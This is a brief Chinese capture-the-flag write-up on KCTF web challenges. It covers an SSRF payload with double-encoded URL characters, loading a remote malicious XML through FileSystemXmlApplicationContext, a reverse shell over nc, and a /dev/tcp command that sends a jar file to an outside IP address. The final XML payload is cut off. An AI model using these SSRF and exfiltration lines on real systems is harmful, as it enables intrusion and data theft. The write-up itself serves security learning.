KCTF几道Web题目复现
右键源代码
改header头都没有用,应该是SSRF了。
尝试读文件
1 | /getimage?url=http://127.0.0.1%253a8088%253fwww.pediy.com/loadConfig?url=x.xml |
官方wp说FileSystemXmlApplicationContext
可以加载远程恶意的xml
文件
然后反弹shell,通过nc
1 | cat vip-demo-0.0.1-SNAPSHOT.jar > /dev/tcp/144.34.200.151/9966 |
下载jar包,在本地反编译就可以得到flag。
1 | <!DOCTYPE any [ |